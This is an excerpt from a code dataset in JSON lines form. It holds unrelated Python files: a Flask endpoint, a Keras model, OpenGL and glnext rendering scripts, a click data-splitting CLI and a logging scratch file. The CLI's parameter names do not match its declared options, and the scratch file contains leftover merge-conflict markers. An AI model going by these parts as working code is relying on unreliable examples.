)\n\n # add in the Pingback header links as they are valid for all HTML views\n pingback_uri = config.URI_SITE_INSTANCE_BASE + self.site_no + \"/pingback\"\n headers = {\n 'Link': '<{}>;rel = \"http://www.w3.org/ns/prov#pingback\"'.format(pingback_uri)\n }\n\n return Response(\n render_template(\n 'page_site.html',\n view=model_view,\n site_no=self.site_no,\n entry_date=self.entry_date,\n view_title=view_title,\n sample_table_html=sample_table_html,\n date_now=datetime.now().strftime('%d %B %Y'),\n gm_key=config.GOOGLE_MAPS_API_KEY,\n google_maps_js=self._generate_google_map_js(),\n lat=self.centroid_y,\n lon=self.centroid_x,\n geometry_type=self.geometry_type,\n coords=self.coords\n ),\n headers=headers\n )\n\n\nclass ParameterError(ValueError):\n pass\n\n\nif __name__ == '__main__':\n # s = Site(17943)\n # s._populate_from_oracle_api()\n # print(s.export_nemsr_geojson())\n pass\n","sub_path":"model/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":18090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48737760","text":"from globals import Globals\nfrom flask_restplus import Resource, Namespace\nfrom flask import jsonify\nimport os\nimport logging\n\napi = Namespace('vcf', description=\"Status for VCF file conversion\")\n\n\n@api.route('/status')\n@api.doc(description=\"Status of VCF file\")\nclass Download(Resource):\n parser = api.parser()\n parser.add_argument('job_id', type=str, required=True, help=\"Job identifier\")\n\n @api.expect(parser)\n def get(self):\n args = self.parser.parse_args()\n\n job_dir = os.path.join(Globals.UPLOAD_FOLDER, args['job_id'])\n logging.info(\"Looking for data in: {}\".format(job_dir))\n filename = \"{}.vcf.gz\".format(args['job_id'])\n logging.info(\"Looking for completed filename in: {}\".format(filename))\n\n # check job dir is valid\n if not os.path.isdir(job_dir):\n logging.error(\"Directory does not exist, check UUID\")\n return \"Job {} does not exist on server\".format(args['job_id']), 404\n\n # check output file is ready for download\n if not os.path.exists(os.path.join(job_dir, filename)):\n logging.info(\"No outputs available. Result are processing or failed\")\n return jsonify(message=\"Job {} is not complete. Please check back later, a job will take at least 30-60 minutes depending on load and GWAS genotype density.\".format(args['job_id']))\n\n return jsonify(message=\"Job {} is complete.\".format(args['job_id']),\n vcf_uri=\"/vcf/download?job_id=\" + args['job_id'] + \"&file_type=vcf\",\n tbi_uri=\"/vcf/download?job_id=\" + args['job_id'] + \"&file_type=tbi\")\n","sub_path":"app/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"609602385","text":"from keras.layers import Conv2D, AveragePooling2D, MaxPooling2D, SeparableConv2D\nfrom keras.layers import Dense, BatchNormalization, Dropout, Activation, regularizers\nfrom keras.layers.merge import concatenate\nimport keras as k\nimport tensorflow as tf\n#一个666的模型\nclass my_alex(object):\n def __init__(self, x):\n self.x = x\n self.init = k.initializers.glorot_normal()\n self.regular = regularizers.l1_l2(l1=0.1, l2=0.5)\n self.trainable1 = True\n self.trainable2 = True\n def predict(self):\n net1 = Conv2D(64, (7, 7), padding='same', strides=[2, 2],\n kernel_initializer=self.init, activation='relu', trainable=self.trainable1)(self.x)\n net1 = block(x=net1, f=64, init=self.init, trainable=self.trainable1)\n net2 = Conv2D(128, (3, 3), padding='same', strides=[1, 1], activation='relu',\n kernel_initializer=self.init, trainable=self.trainable1)(net1)\n net2 = MaxPooling2D((3, 3), strides=(2, 2), trainable=self.trainable1)(net2)\n net2 = block(x=net2, f=128, init=self.init, trainable=self.trainable1)\n net2 = block(x=net2, f=128, init=self.init, trainable=self.trainable1)\n net3 = Conv2D(256, (3, 3), padding='same', strides=[1, 1], activation='relu',\n kernel_initializer=self.init, trainable=self.trainable1)(net2)\n net3 = MaxPooling2D((3, 3), strides=(2, 2))(net3)\n net3 = block(x=net3, f=256, init=self.init, trainable=self.trainable2)\n net3 = block(x=net3, f=256, init=self.init, trainable=self.trainable2)\n net4 = MaxPooling2D((3, 3), strides=(2, 2))(net3)\n net4 = Conv2D(256, (3, 3), padding='same', strides=[1, 1], activation='relu',\n kernel_initializer=self.init, trainable=self.trainable2)(net4)\n net4 = block(x=net4, f=256, init=self.init, trainable=self.trainable2)\n net5 = tf.reshape(net4, [-1, 7*2*256])\n net_m = Dense(4096, activation='tanh', trainable=self.trainable2)(net5)\n net_s = Dense(128, trainable=self.trainable2)(net_m)\n return net_s, net_m\ndef block(x, f, init,trainable):\n b1 = SeparableConv2D(filters=f, kernel_size=(3, 3), padding='same', depth_multiplier=1)(x)\n b1 = Conv2D(f, (1, 1), padding='same', strides=[1, 1], activation='relu',\n kernel_initializer=init, trainable=trainable)(b1)\n b2 = SeparableConv2D(filters=f, kernel_size=(3, 3), padding='same', depth_multiplier=1)(b1)\n b2 = Conv2D(f, (1, 1), padding='same', strides=[1, 1], activation='relu',\n kernel_initializer=init, trainable=trainable)(b2)\n b3 = b2+x\n return b3\n","sub_path":"zjc_footnet.py","file_name":"zjc_footnet.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186292587","text":"import glnext\nfrom glnext_compiler import glsl\nfrom objloader import Obj\nfrom PIL import Image\n\ninstance = glnext.instance()\ntask = instance.task()\n\nframebuffer = task.framebuffer((512, 512))\n\nuniform_buffer = instance.buffer('uniform_buffer', 64)\n\npipeline = framebuffer.render(\n vertex_shader=glsl('''\n #version 450\n #pragma shader_stage(vertex)\n\n layout (binding = 0) uniform Buffer {\n mat4 mvp;\n };\n\n layout (location = 0) in vec3 in_vert;\n layout (location = 1) in vec3 in_norm;\n\n layout (location = 0) out vec3 out_norm;\n\n void main() {\n gl_Position = mvp * vec4(in_vert, 1.0);\n out_norm = in_norm;\n }\n '''),\n fragment_shader=glsl('''\n #version 450\n #pragma shader_stage(fragment)\n\n layout (binding = 0) uniform Buffer {\n mat4 mvp;\n };\n\n layout (location = 0) in vec3 in_norm;\n\n layout (location = 0) out vec4 out_color;\n\n void main() {\n vec3 color = vec3(1.0, 1.0, 1.0);\n vec3 sight = -vec3(mvp[0].w, mvp[1].w, mvp[2].w);\n float lum = dot(normalize(sight), normalize(in_norm)) * 0.7 + 0.3;\n out_color = vec4(lum, lum, lum, 1.0);\n }\n '''),\n vertex_format='3f 3f',\n vertex_count=36,\n bindings=[\n {\n 'binding': 0,\n 'type': 'uniform_buffer',\n 'buffer': uniform_buffer,\n },\n ],\n)\n\nuniform_buffer.write(glnext.camera((4.0, 3.0, 2.0), (0.0, 0.0, 0.0)))\n\npipeline.update(\n vertex_buffer=Obj.open('examples/cube.obj').pack('vx vy vz nx ny nz'),\n)\n\ntask.run()\ndata = framebuffer.output[0].read()\nImage.frombuffer('RGBA', (512, 512), data, 'raw', 'RGBA', 0, -1).show()\n","sub_path":"examples/external_uniform_buffer.py","file_name":"external_uniform_buffer.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"244092533","text":"\"\"\"\nSHRISTIKA YADAV\n\"\"\"\nimport sys\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom numpy import array, arange\nfrom lamp import teapot\nfrom quad import quad\nfrom ball import ball\nfrom shaderSetup import shaderSetup\nfrom viewParams import viewParams\nfrom textures import *\nfrom lighting import *\nfrom simpleShape import *\nfrom bufferSet import *\n\nclass textingMain (object) :\n # rotation control\n anglesReset = [30.0, 30.0, 0.0]\n angles = [30.0, 30.0, 0.0]\n angleInc = 5.0\n viewMode = 1\n cameraNum = 1\n\n # our viewparams\n view = viewParams ()\n\n # lighting and textures\n tex = textures ()\n light = lighting()\n\n # dimensions of the drawing window\n w_width = 1000\n w_height = 1000\n\n # buffer information\n quadBuffers = bufferSet(None) # floor\n teapotBuffers = bufferSet(None) # lamp\n houseBuffers = bufferSet(None) #ball\n\n # animation flag\n animating = False\n\n # initial rotations\n rotQuad = 0.0\n rotTeapot = 0.0\n rothouse = 0.0\n\n # program IDs...for program and parameters\n pshader = GLuint (0)\n tshader = GLuint (0)\n hshader = GLuint(0)\n\n # vertex array object\n qVao = GLuint(0)\n tVao = GLuint(0)\n hVao = GLuint(0)\n\n\n #\n # initialization\n #\n def init (self):\n\n # Load your textures\n self.tex.loadTexture()\n\n # Load shaders and verify each\n myShaders = shaderSetup(None)\n self.tshader = myShaders.readAndCompile(\"texture.vert\", \"texture.frag\")\n if self.tshader <= 0:\n print (\"Error setting up Texture shaders\")\n raise Exception(\"Error setting up Texture Shaders\", \"fatal\")\n sys.exit(1)\n\n self.pshader = myShaders.readAndCompile(\"phong.vert\", \"phong.frag\")\n if self.pshader <= 0:\n print (\"Error setting up Phong shaders\")\n raise Exception(\"Error setting up Phong Shaders\", \"fatal\")\n sys.exit(1)\n\n self.hshader = myShaders.readAndCompile(\"phong.vert\", \"phong.frag\")\n if self.hshader <= 0:\n print (\"Error setting up Phong shaders\")\n raise Exception(\"Error setting up Phong Shaders\", \"fatal\")\n sys.exit(1)\n\n # Other OpenGL initialization\n glEnable( GL_DEPTH_TEST )\n glClearColor( 0.0, 0.0, 0.0, 0.0 )\n glPolygonMode( GL_FRONT_AND_BACK, GL_FILL )\n glClearDepth( 1.0 )\n\n # create teapot(lamp)\n myShape = teapot()\n myShape.clear()\n myShape.makeTeapot()\n self.tVao = self.createVAO(myShape, self.pshader, self.teapotBuffers )\n\n # create quad\n myShape = quad ()\n myShape.clear()\n myShape.makeQuad()\n self.qVao = self.createVAO(myShape, self.tshader, self.quadBuffers )\n\n # create Ball(house)\n myShape = ball()\n myShape.clear()\n myShape.makeBall()\n self.hVao = self.createVAO(myShape, self.hshader, self.houseBuffers)\n\n\n '''\n * Creates VAO for given set of objects. Returns the VAO ID\n '''\n def createVAO (self, shape, program, B) :\n\n # Get yourself an ID\n vaoID = GLuint(0)\n glGenVertexArrays(1, vaoID)\n\n # You'll need the correct program to get the location of the vertex\n # attributes\n glUseProgram(program)\n\n # Bind the vertex array object\n glBindVertexArray (vaoID)\n\n # Make and fill your buffer\n # create the buffers\n B.createBuffers (shape)\n\n # set buffers to correct vertext attribute\n vPosition = glGetAttribLocation(program,\"vPosition\")\n glEnableVertexAttribArray(vPosition)\n glBindBuffer (GL_ARRAY_BUFFER, B.vbuffer);\n glVertexAttribPointer(vPosition,4,GL_FLOAT,GL_FALSE,0,ctypes.c_void_p(0))\n\n # color data\n if( B.cSize > 0) :\n vColor = glGetAttribLocation( program, \"vColor\" )\n glEnableVertexAttribArray( vColor )\n glBindBuffer (GL_ARRAY_BUFFER, B.cbuffer);\n glVertexAttribPointer( vColor, 4, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p (0))\n\n\n # normal data\n if( B.nSize > 0 ) :\n vNormal = 0#glGetAttribLocation( program, \"vNormal\" )\n glEnableVertexAttribArray( vNormal )\n glBindBuffer (GL_ARRAY_BUFFER, B.nbuffer);\n glVertexAttribPointer( vNormal, 3, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p (0))\n\n # texture coord data\n if( B.tSize > 0 ) :\n vTexCoord = 0 #glGetAttribLocation( program, \"vTexCoord\" )\n glEnableVertexAttribArray( vTexCoord );\n glBindBuffer (GL_ARRAY_BUFFER, B.tbuffer);\n glVertexAttribPointer( vTexCoord, 2, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p (0))\n\n # return your ID\n return vaoID\n\n #\n # keyboard function\n #\n def keyPressed(self,*args):\n\n #Get the key that was pressed\n key = str(args[0].decode())\n\n # ==============================================\n # view mode\n if (key == '1'):\n self.viewMode = 1\n # self.updateDisplay = True\n elif (key == '2'):\n self.viewMode = 2;\n # self.updateDisplay = True\n else:\n self.viewMode = 1;\n\n # ==============================================\n\n\n # animate\n if(key == 'a'):\n self.animating = True\n\n # stop animating\n elif (key == 's') :\n self.animating = False\n\n # reset rotations\n elif (key == 'r') :\n self.rotTeapot = 0.0\n self.rothouse = 0.0\n self.rotQuad = 0.0\n self.display()\n elif (key == 'x'):\n self.cameraNum = 1\n elif (key == 'k'):\n self.cameraNum = 2\n elif (key == 'l'):\n self.cameraNum = 3\n else:\n self.cameraNum = 1\n\n # quit\n if(key == 'q' or key == 'Q'):\n sys.exit()\n elif(args[0] == '\\033'): #Escape character\n sys.exit()\n\n # Animate the objects (maybe)\n def animate( self ) :\n if( self.animating ) :\n self.rotTeapot = self.rotTeapot + 0.5 #(speed)\n self.rotQuad = self.rotQuad + 0.5\n self.rothouse = self.rothouse + 0.5\n self.display()\n pass\n\n\n\n # bind the correct vertex and element buffere\n def selectBuffers(self, program, B):\n # bind the buffers\n glBindVertexArray(self.vaoID)\n glBindBuffer(GL_ARRAY_BUFFER, B.vbuffer)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, B.ebuffer)\n\n # set up the vertex attribute variables\n glEnableVertexAttribArray(self.vPosition)\n glVertexAttribPointer(self.vPosition, 4, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p(0))\n\n # send down our rotation angles\n glUniform3fv(self.theta, 1, self.angles)\n\n\n\n #\n # display function\n #\n def display( self ) :\n\n # clear the frame buffer\n glClear( GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT )\n\n\n\n # first the quad\n glUseProgram (self.tshader)\n\n # set up viewing and projection parameters\n self.view.setUpFrustum( self.tshader )\n\n # set up the texture information\n self.tex.setUpTexture( self.tshader )\n\n # set up the camera\n # self.view.setUpCamera( self.tshader, 0.2, 3.0, 6.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0 )\n\n # set up the camera\n if self.cameraNum == 1:\n self.view.setUpCamera( self.tshader, 0.2, 3.0, 6.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n elif self.cameraNum == 2:\n self.view.setUpCamera(self.tshader, 0.0, 8.0, 2.5, 0.0, 2.0, -0.7, 0.0, 1.0, 0.0)\n else:\n self.view.setUpCamera(self.tshader, -0.5, 1.0, 7.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n\n\n # set up transformations for the quad\n self.view.setUpTransforms( self.tshader, 0.75, 0.75, 0.75, 0.0, self.rotQuad, 0.0, -1.25, -0.25, -2.0)\n\n # draw it\n glBindVertexArray (self.qVao)\n glDrawArrays(GL_TRIANGLES, 0, self.quadBuffers.numElements)\n\n # -------------------------------------------------------\n\n # now the lamp (teapot)\n glUseProgram( self.pshader )\n\n # -------------------------------------------------------\n\n if (self.viewMode == 1):\n self.view.setUpFrustum(self.pshader)\n\n elif (self.viewMode == 2):\n self.view.setUpOrtho(self.pshader)\n else:\n self.view.setUpFrustum(self.pshader)\n\n # ==========================================================================\n\n # set up viewing and projection parameters\n # self.view.setUpFrustum( self.pshader )\n\n # set up the Phong shading information\n self.light.setUpPhong( self.pshader )\n\n # set up the camera\n if self.cameraNum == 1:\n self.view.setUpCamera( self.pshader, 0.2, 3.0, 6.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n elif self.cameraNum == 2:\n self.view.setUpCamera(self.pshader, 0.0, 8.0, 2.5, 0.0, 2.0, -0.7, 0.0, 1.0, 0.0)\n else:\n self.view.setUpCamera(self.pshader, -0.5, 1.0, 7.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n\n\n # set up transforms\n self.view.setUpTransforms( self.pshader, 0.3, 0.3, 0.3, 0.0, self.rotTeapot, 0.0, 1.5, 0.5, -1.5 )\n\n # draw it\n glBindVertexArray (self.tVao)\n glDrawArrays(GL_TRIANGLES, 0, self.teapotBuffers.numElements)\n\n\n\n # -------------------------------------------------------\n\n\n # # now the ball (house)\n glUseProgram(self.hshader)\n\n\n # -------------------------------------------------------\n\n if (self.viewMode == 1):\n self.view.setUpFrustum(self.hshader)\n elif (self.viewMode == 2):\n self.view.setUpOrtho(self.hshader)\n else:\n self.view.setUpFrustum(self.hshader)\n\n # ==========================================================================\n\n # set up viewing and projection parameters\n # self.view.setUpFrustum(self.hshader)\n\n # set up the Phong shading information\n self.light.setUpPhong(self.hshader)\n\n # set up the camera\n # self.view.setUpCamera(self.hshader, 0.2, 3.0, 6.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n\n # set up the camera\n if self.cameraNum == 1:\n self.view.setUpCamera( self.hshader, 0.2, 3.0, 6.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n elif self.cameraNum == 2:\n self.view.setUpCamera(self.hshader, 0.0, 8.0, 2.5, 0.0, 2.0, -0.7, 0.0, 1.0, 0.0)\n else:\n self.view.setUpCamera(self.hshader, -0.5, 1.0, 7.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n\n # set up transforms\n self.view.setUpTransforms(self.hshader, 0.3, 0.3, 0.3, 0.0, self.rothouse, 0.0, 1.5, 0.5, -1.5)\n\n # draw it\n glBindVertexArray(self.hVao)\n glDrawArrays(GL_TRIANGLES, 0,self.houseBuffers.numElements)\n\n # Swap the buffers\n glutSwapBuffers()\n\n\n\n\n # main function\n def main(self):\n\n glutInit()\n glutInitDisplayMode(GLUT_RGBA|GLUT_ALPHA|GLUT_DOUBLE|GLUT_DEPTH|GLUT_3_2_CORE_PROFILE)\n glutInitWindowSize(1000,1000)\n glutCreateWindow(b\"Transformation Demo\")\n\n self.init()\n glutDisplayFunc(self.display)\n glutIdleFunc(self.animate)\n glutKeyboardFunc(self.keyPressed)\n\n glutMainLoop()\n\n self.dispose()\n\n\nif __name__ == '__main__':\n textingMain().main()\n\n","sub_path":"textingMain.py","file_name":"textingMain.py","file_ext":"py","file_size_in_byte":11402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"229821981","text":"#!/bin/python\n\n\"\"\"\nlesson2.py\n\nThis script implements the key points from the Lesson 2 exercises, expressed in the lesson2.pydb Jupyter Notebook.\n\nUsage:\n lesson2.py [options] [command-options] \n\nWhere:\n commands:\n train Train and/or fine-tune the model using training/validation data in the data-folder.\n options:\n --batch-size\n --epochs\n --learn-rate\n\n predict Use a trained model to predict the image classes from test data in the data-folder.\n\n options:\n --cache Load data from local data files from previous runs to speed processing.\n --weights Load model weights from file.\n --test Just go through the motions, don't actually do anything.\n\nExample:\n lesson2.py --data --cache train\n lesson2.py --data --weights predict\n\n\"\"\"\n\nimport os\nimport random\nimport shutil\nimport fnmatch\n\nimport click\n\n\nTRAIN_FOLDER = 'train'\nVALID_FOLDER = 'valid'\nTEST_FOLDER = 'test'\nSAMPLE_FOLDER = 'sample'\nMODEL_FOLDER = 'model'\n\nTEST_ONLY = False\nCLASSES = [\n # (filename, foldername),\n ('dog', 'dogs'),\n ('cat', 'cats')\n]\n\n\n@click.group()\n@click.option('--cache', is_flag=True, help='Load data from local data files from previous runs to speed processing.')\n@click.option('--weights', is_flag=True, help='Load data from local data files from previous runs to speed processing.')\n@click.option('--test', is_flag=True, help='Show what will happen, but don\\'t actually do it.')\ndef cli(test):\n '''Root (pseudo) command'''\n global TEST_ONLY\n TEST_ONLY = test\n if TEST_ONLY:\n click.echo('Running in TEST MODE; no changes will be made.')\n\n\n@cli.command(help='Train and/or fine-tune the model using training/validation data in the data-folder.')\n@click.argument('data-folder')\ndef train(folder):\n '''\n Trains and/or fine-tunes the vgg16 model to recognize dog or cat images only.\n\n The given folder must contain the following sub-folders:\n train/\n test/\n valid/\n\n Arguments:\n\n folder -- The root folder of the training, test, and validation data sets.\n '''\n folder_path = os.path.normpath(folder)\n\n click.echo('Validating data folder %s' % (folder_path,))\n\n validateFolder(folder_path)\n validateFolder(os.path.join(folder_path, TRAIN_FOLDER))\n validateFolder(os.path.join(folder_path, VALID_FOLDER))\n validateFolder(os.path.join(folder_path, TEST_FOLDER))\n\n click.echo('Training the model using data from %s' % (folder_path,))\n\n click.echo('Finished training the model using data from %s.' % (folder_path,))\n\n\n@cli.command(help='Use a trained model to predict the image classes from test data in the data-folder.')\n@click.argument('data-folder')\ndef predict(folder):\n '''\n Predicts whether images in the test data set are dogs or cats.\n\n The given folder must contain the following sub-folders:\n train/\n test/\n valid/\n\n Arguments:\n\n folder -- The root folder of the training, test, and validation data sets.\n '''\n folder_path = os.path.normpath(folder)\n\n click.echo('Validating data folder %s' % (folder_path,))\n\n validateFolder(folder_path)\n validateFolder(os.path.join(folder_path, TRAIN_FOLDER))\n validateFolder(os.path.join(folder_path, VALID_FOLDER))\n validateFolder(os.path.join(folder_path, TEST_FOLDER))\n\n click.echo('Predicting using data from %s' % (folder_path,))\n\n click.echo('Finished training the model using data from %s.' %\n (folder_path,))\n\n@cli.command(help='Splits part of source_folder contents into dest_folder.')\n@click.option('--percent', default=20, help='Size of validation data set as percent of all files.')\n@click.argument('source_folder')\n@click.argument('dest_folder')\ndef split(source_folder, dest_folder, percent):\n '''\n Moves a subset of the contents of source_folder into dest_folder.\n '''\n source_folder = os.path.normpath(source_folder)\n dest_folder = os.path.normpath(dest_folder)\n\n click.echo('Splitting [%s%%] of data set from folder [%s] into folder [%s].' % (\n percent, source_folder, dest_folder))\n\n validateFolder(source_folder)\n\n if not os.path.exists(dest_folder):\n if TEST_ONLY:\n click.echo('TEST: creating folder [%s]' % (dest_folder,))\n else:\n os.makedirs(dest_folder)\n\n file_paths = getFilePaths(source_folder)\n selected_paths = selectRandomPaths(source_folder, percent)\n\n click.echo('Selected [%s] random files of [%s] from [%s]' %\n (len(selected_paths), len(file_paths), source_folder))\n\n moveFiles(selected_paths, source_folder, dest_folder)\n click.echo('Finished splitting [%s%%] of data set from folder [%s] into folder [%s].' %\n (percent, source_folder, dest_folder))\n\n\n@cli.command(help='Create a sample data set from folder contents.')\n@click.option('--percent', default=1, help='Size of sample data set as percent of source data set.')\n@click.argument('source_folder')\n@click.argument('dest_folder')\ndef sample(source_folder, dest_folder, percent):\n '''\n Copies the a percentage of the files in source_folder using into dest_folder.\n '''\n click.echo('Creating sample dataset, using [%s percent] of [%s] contents in folder [%s]' %\n (percent, source_folder, dest_folder))\n\n validateFolder(source_folder)\n\n if not os.path.exists(dest_folder):\n if TEST_ONLY:\n click.echo('TEST: creating folder [%s]' % (dest_folder,))\n else:\n os.makedirs(dest_folder)\n\n file_paths = getFilePaths(source_folder)\n selected_paths = selectRandomPaths(source_folder, percent)\n\n click.echo('Selected [%s] random files of [%s] from [%s]' %\n (len(selected_paths), len(file_paths), source_folder))\n\n copyFiles(selected_paths, source_folder, dest_folder)\n click.echo('Finished copying [%s%%] of data set from folder [%s] into folder [%s].' %\n (percent, source_folder, dest_folder))\n\n\ndef validateFolder(folder):\n '''\n Assert that the given folder exists.\n\n Arguments:\n\n folder -- The folder to validate.\n '''\n assert os.path.exists(folder), 'Folder [%s] does not exist' % folder\n\n\ndef selectRandomPaths(folder_path, percent):\n '''\n Randomly select a subset of files from the given folder.\n\n Return a sequence containing the paths to the selected files.\n '''\n file_paths = getFilePaths(folder_path)\n selected_paths = selectRandomPercent(file_paths, percent)\n\n return selected_paths\n\n\ndef getFilePaths(folder_path, file_match=None):\n '''\n Return a list of path names contained within the folder identified by folder_path.\n Optionally filter the result to match the file name pattern specified by file_match.\n Returned paths are not absolute; they are relative to the folder_path argument.\n\n Keyword arguments:\n\n folder_path -- Path to the folder containing the files.\n\n file_match -- Optional file name pattern by which to filter the result.\n '''\n file_paths = []\n for root, dirs, files in os.walk(folder_path):\n filtered_paths = [os.path.relpath(\n os.path.join(root, f), folder_path) for f in files]\n if file_match:\n filtered_paths = fnmatch.filter(filtered_paths, file_match)\n\n file_paths += filtered_paths\n\n return file_paths\n\n\ndef selectRandomPercent(source_seq, percent):\n '''\n Randomly select elements from source_seq such that the\n number of selected elements comprises the given percentage of the\n total number of elements in the sequence.\n\n Return a sequence containing the selected elements.\n The original sequence isn't changed.\n\n Arguments:\n\n source_seq -- A sequence containing the set of elements from which to select.\n\n percent -- The percentage of source_seq elements to select.\n '''\n select_count = int(len(source_seq) * percent / 100.0)\n selected_seq = random.sample(source_seq, select_count)\n\n return selected_seq\n\n\ndef moveFiles(paths, source_folder, dest_folder):\n '''\n Move all the files in the paths array from the source_folder to the dest_folder.\n\n The files to move are represented using relative paths, relative to both the\n source_folder and dest_folder.\n\n If dest_folder doesn't exist, it will be created, down to the leafmost level.\n\n Arguments:\n\n paths -- List of relative paths identifying the files to move.\n\n source_folder -- Path to the folder containing the files to move.\n\n dest_folder -- Path to the folder into which the files will be moved.\n '''\n for path in paths:\n source_path = os.path.join(source_folder, path)\n dest_path = os.path.join(dest_folder, path)\n dest_parent_path = os.path.dirname(dest_path)\n\n if not os.path.exists(dest_parent_path):\n if TEST_ONLY:\n click.echo('TEST: creating folder %s' % (dest_parent_path,))\n else:\n os.makedirs(dest_parent_path)\n\n if TEST_ONLY:\n click.echo('TEST: Moving %s to %s' % (source_path, dest_path))\n else:\n click.echo('Moving %s to %s' % (source_path, dest_path))\n shutil.move(source_path, dest_path)\n\n click.echo('Moved %s files from %s to %s' %\n (len(paths), source_folder, dest_folder))\n\n\ndef copyFiles(paths, source_folder, dest_folder):\n '''\n Copy all the files in the paths array from the source_folder to the dest_folder.\n\n The files to move are represented using relative paths, relative to both the\n source_folder and dest_folder.\n\n If dest_folder doesn't exist, it will be created, down to the leafmost level.\n\n Arguments:\n\n paths -- List of relative paths identifying the files to copy.\n\n source_folder -- Path to the folder containing the files to copy.\n\n dest_folder -- Path to the folder into which the files will be copied.\n '''\n for path in paths:\n source_path = os.path.join(source_folder, path)\n dest_path = os.path.join(dest_folder, path)\n dest_parent_path = os.path.dirname(dest_path)\n\n if not os.path.exists(dest_parent_path):\n if TEST_ONLY:\n click.echo('TEST: creating folder %s' % (dest_parent_path,))\n else:\n os.makedirs(dest_parent_path)\n\n if TEST_ONLY:\n click.echo('TEST: Copying %s to %s' % (source_path, dest_path))\n else:\n click.echo('Copying %s to %s' % (source_path, dest_path))\n shutil.copy(source_path, dest_path)\n\n click.echo('Copied %s files from %s to %s' %\n (len(paths), source_folder, dest_folder))\n","sub_path":"deeplearning1/nbs/lesson2-cli.py","file_name":"lesson2-cli.py","file_ext":"py","file_size_in_byte":10741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"367279944","text":"\nfrom SVLog import NickModul\nimport logging\nfrom logging import log\nimport logging.config\n\nclass Car:\n def Test(self):\n print(\"First\")\n \n \n class Audi:\n def remove():\n print(\"Yes\")\n\nCar = Car()\nCar.Test()\nCar.Audi.remove()\n\n\nlogging.config.fileConfig(fname='file.conf', disable_existing_loggers=False)\n\n#NickModul.config.fileConfig\n\nlogging.config.fileConfig('logging.conf')\n\n# create logger\nlogger = logging.getLogger('simpleExample')\n\n# 'application' code\nlogger.debug('debug message')\nlogger.info('info message')\nlogger.warning('warn message')\nlogger.error('error message')\nlogger.critical('critical message')\n\n\n\n'''\n# create logger with 'spam_application'\nlogger = logging.getLogger('spam_application')\nlogger.setLevel(logging.DEBUG)\n# create file handler which logs even debug messages\nfh = logging.FileHandler('spam2.log')\nprint(fh)\n#fh.setLevel(logging.DEBUG)\n# create console handler with a higher log level\nch = logging.StreamHandler()\n#ch.setLevel(logging.ERROR)\n# create formatter and add it to the handlers\n# add the handlers to the logger\nlogger.addHandler(fh)\nprint(logger)\nlogger.addHandler(ch)\n\nlogger.info('creating an instance of auxiliary_module.Auxiliary')\n'''\n\nprint('__________________________________________________')\n\n\nprint(\"test1\")\nprint(\"-----\")\nprint(\"test2\")\nprint(\"-----\")\nh1_getLogger = logging.getLogger('Test')\nprint(\"test3\")\nprint(h1_getLogger)\nprint(\"-----\")\nprint(\"test4\")\nprint(type(h1_getLogger))\nprint(\"-----\")\n\nprint('___________________________________________________')\n\nclass LogginNick:\n def data(self, method):\n method = method\n\n global h1\n if method == 'getLogger':\n name = 'Test'\n h1 = logging.getLogger(name)\n print(h1)\n \n elif method == 'logger.warning':\n h1.warning(\"This is a logging message\")\n \n elif method == 'logger.debug':\n h1.debug(\"This is a debug Log\")\n \n else:\n pass\n\n\nLoggingNick = LogginNick()\nprint(type(LoggingNick.data('getLogger')))\nLoggingNick.data('logger.warning')\n\n\nh1 = logging.getLogger(\"Test\")\nh1.warning(\"This is log test warning\")\n\n\nprint(\"------------------------------------------\")\n\n\n'''\nclass Car:\n<<<<<<< HEAD\n=======\n<<<<<<< HEAD\n\n def decide(self, method):\n if method == 'testlogger':\n Car.Audi('TestLog')\n elif method == 'testwarning':\n Car.motor('This is a warning')\n\n def Audi(self, name):\n self.h1_logger = logging.getLogger(name)\n return self.h1_logger\n \n def motor(self, msg):\n self.h1_logger.warning(msg)\n\n\n=======\n>>>>>>> Branch2_only_one_class\n def Audi(self, modell):\n print(modell)\n self.price1 = 20\n return self.price1\n \n def motor(self):\n total_power = self.price1 *10\n print(f\"This is a new M-Modell with a price of {total_power} $\")\n<<<<<<< HEAD\n\n \n\n=======\n\n \n\n>>>>>>> master\n>>>>>>> Branch2_only_one_class\nclass BMW:\n print(\"Test1\")\n def msport(self):\n print(\"Test2\")\n self.price_total = self.price1 *100\n print(f\"This is a new M-Modell with a toalprice of {self.price_total} $\")\n\n\nCar = Car()\nprint(\"----------------------\")\n<<<<<<< HEAD\n=======\n<<<<<<< HEAD\n\nCar.decide('testlogger')\nprint(\"_________________\")\nCar.decide('testwarning')\n\nprint(\"----------------------\")\n'''\narguments = [{'test':'something'}]\nprint(arguments)\nprint(arguments[0])\n\n\n'''\n\nclass Auto(Car):\n def newengine(self, newPs):\n x = Car.engine + newPs\n print(x)\n\n\n\n\ncar = Car()\ncar.engine(150)\n\nAuto = Auto()\nAuto.newengine(100)\n\n'''\n\nprint(\"------------------------------------------\")\n\ny = (23, 4332)\nz = {'marke': 'BMW', 'art': 'X3', 'leistung': 